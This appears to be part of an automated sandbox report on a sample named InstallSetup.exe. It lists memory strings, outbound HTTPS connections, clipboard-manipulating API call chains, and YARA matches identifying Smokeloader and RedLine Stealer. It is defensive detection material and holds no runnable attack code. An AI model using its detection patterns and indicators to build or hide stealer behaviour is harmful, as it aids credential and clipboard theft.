Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: C7B4.tmp.exe, 00000003.00000003.1616514614.000000000313B000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616583872.0000000003138000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1616746499.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C7B4.tmp.exe, 00000003.00000003.1662866086.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: C7B4.tmp.exe, 00000003.00000003.1663117027.000000000350A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49714 version: TLS 1.2

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00941942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_00941942

Source: C:\Users\user\Desktop\InstallSetup.exe

0_2_004016DF

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00942361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_00942361
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00942605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_00942605

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0043D678	0_2_0043D678
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0096ED47	0_2_0096ED47
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00954172	0_2_00954172
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00968289	0_2_00968289
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_009676EB	0_2_009676EB
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_009687C7	0_2_009687C7
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0096D755	0_2_0096D755
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0095398C	0_2_0095398C
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00956916	0_2_00956916
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00967A5D	0_2_00967A5D
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0094EBDB	0_2_0094EBDB
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00958D16	0_2_00958D16
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00967D07	0_2_00967D07
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0096ED47	0_2_0096ED47
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00967FCE	0_2_00967FCE
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00976F26	0_2_00976F26
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00408850	3_2_00408850
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004218A0	3_2_004218A0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00422190	3_2_00422190
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00437DF0	3_2_00437DF0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00409580	3_2_00409580
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00415799	3_2_00415799
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00423860	3_2_00423860
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00438810	3_2_00438810
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041682D	3_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004288CB	3_2_004288CB
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043D880	3_2_0043D880
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00430940	3_2_00430940
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00403970	3_2_00403970
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00420939	3_2_00420939
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004179C1	3_2_004179C1
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004231C2	3_2_004231C2
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004241C0	3_2_004241C0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043B1D0	3_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004291DD	3_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043D980	3_2_0043D980
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00405990	3_2_00405990
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043D997	3_2_0043D997
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043D999	3_2_0043D999
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004091B0	3_2_004091B0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042CA49	3_2_0042CA49
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042DA53	3_2_0042DA53
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00416263	3_2_00416263
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0040EA10	3_2_0040EA10
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00415220	3_2_00415220
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042CAD0	3_2_0042CAD0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004252DD	3_2_004252DD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041B2E0	3_2_0041B2E0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00406280	3_2_00406280
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043DA80	3_2_0043DA80
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041E290	3_2_0041E290
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041CB40	3_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043D34D	3_2_0043D34D
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00426B50	3_2_00426B50
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043DB60	3_2_0043DB60
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00436B08	3_2_00436B08
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042830D	3_2_0042830D
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042CB11	3_2_0042CB11
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00404320	3_2_00404320
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042CB22	3_2_0042CB22
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00425327	3_2_00425327
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00408330	3_2_00408330
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043F330	3_2_0043F330
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042A33F	3_2_0042A33F
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0040DBD9	3_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00424380	3_2_00424380
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041FC75	3_2_0041FC75
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041DC00	3_2_0041DC00
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00429C2B	3_2_00429C2B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004291DD	3_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0040ACF0	3_2_0040ACF0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041148F	3_2_0041148F
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042AC90	3_2_0042AC90
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043ECA0	3_2_0043ECA0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0040CD46	3_2_0040CD46
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00437500	3_2_00437500
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00422510	3_2_00422510
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00417DEE	3_2_00417DEE
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041759F	3_2_0041759F
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00425E70	3_2_00425E70
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00436E74	3_2_00436E74
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00427603	3_2_00427603
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00425E30	3_2_00425E30
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004286C0	3_2_004286C0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043AEC0	3_2_0043AEC0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004266D0	3_2_004266D0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004236E2	3_2_004236E2
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00405EE0	3_2_00405EE0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041DE80	3_2_0041DE80
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00402F50	3_2_00402F50
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00420F50	3_2_00420F50
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00438F59	3_2_00438F59
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00406710	3_2_00406710
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00423F20	3_2_00423F20
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043F720	3_2_0043F720
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00419F30	3_2_00419F30
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0041E7C0	3_2_0041E7C0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004197C2	3_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0042DFE9	3_2_0042DFE9
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0040A780	3_2_0040A780
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00411F90	3_2_00411F90
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00418792	3_2_00418792
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043EFB0	3_2_0043EFB0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009A70DB	3_2_009A70DB
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009960D7	3_2_009960D7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098E0E7	3_2_0098E0E7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00987806	3_2_00987806
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009A8057	3_2_009A8057
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00988055	3_2_00988055
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098A197	3_2_0098A197
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009AF987	3_2_009AF987
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009911B7	3_2_009911B7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009821F7	3_2_009821F7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0097A9E7	3_2_0097A9E7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00996937	3_2_00996937
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009AB127	3_2_009AB127
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00998927	3_2_00998927
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00976147	3_2_00976147
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00976977	3_2_00976977
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00993166	3_2_00993166
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00978AB7	3_2_00978AB7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009AF217	3_2_009AF217
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098D230	3_2_0098D230
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00989A29	3_2_00989A29
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098EA27	3_2_0098EA27
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0099E250	3_2_0099E250
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009A8A77	3_2_009A8A77
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00990BA0	3_2_00990BA0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009A0BA7	3_2_009A0BA7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00973BD7	3_2_00973BD7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00975BF7	3_2_00975BF7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009923F7	3_2_009923F7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00991B07	3_2_00991B07
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0099DCBC	3_2_0099DCBC
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0099CCB0	3_2_0099CCB0
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098E4F7	3_2_0098E4F7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009764E7	3_2_009764E7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00979417	3_2_00979417
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00999444	3_2_00999444
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0097EC77	3_2_0097EC77
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00978597	3_2_00978597
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009AF597	3_2_009AF597
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00974587	3_2_00974587
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0099CD89	3_2_0099CD89
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0099351D	3_2_0099351D
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0099CD37	3_2_0099CD37
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098B547	3_2_0098B547
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0099CD78	3_2_0099CD78
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009A6D6F	3_2_009A6D6F
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00995694	3_2_00995694
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00994687	3_2_00994687
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098FEDC	3_2_0098FEDC
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009816F6	3_2_009816F6
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0099AEF7	3_2_0099AEF7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0097DE40	3_2_0097DE40
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098CE63	3_2_0098CE63
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0098DE67	3_2_0098DE67
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0097CFAD	3_2_0097CFAD
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009797E7	3_2_009797E7
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009AEF07	3_2_009AEF07
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00986F35	3_2_00986F35
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00992777	3_2_00992777
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009A7767	3_2_009A7767

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: String function: 00950987 appears 53 times
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: String function: 00410720 appears 53 times
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: String function: 00950019 appears 121 times
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: String function: 0040FDB2 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: String function: 00408030 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: String function: 00414400 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: String function: 00984667 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: String function: 00978297 appears 71 times

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1952

Source: InstallSetup.exe	Binary or memory string: OriginalFileName vs InstallSetup.exe
Source: InstallSetup.exe, 00000000.00000003.1479376048.0000000000A10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs InstallSetup.exe
Source: InstallSetup.exe, 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs InstallSetup.exe
Source: InstallSetup.exe, 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs InstallSetup.exe

Source: InstallSetup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: InstallSetup.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
